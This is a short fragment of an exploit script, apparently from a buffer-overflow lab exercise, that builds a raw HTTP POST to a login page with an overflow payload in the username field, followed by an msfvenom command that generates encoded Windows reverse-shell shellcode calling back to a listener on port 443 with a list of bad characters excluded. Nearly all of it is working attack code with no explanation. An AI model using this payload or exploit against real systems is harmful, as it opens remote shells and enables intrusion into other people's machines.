header = b"POST /login HTTP/1.1\r\n"
header += b"Host: " + server.encode() + b"\r\n"
header += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
header += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
header += b"Accept-Language: en-US,en;q=0.5\r\n"
header += b"Referer: http://10.11.0.22/login\r\n"
header += b"Connection: close\r\n"
header += b"Content-Type: application/x-www-form-urlencoded\r\n"
header += b"Content-Length: "+ str(len(data)).encode() + b"\r\n"
header += b"\r\n"

data = b"username=" + payload + b"&password=A"

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.168 LPORT=443 -f python -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"




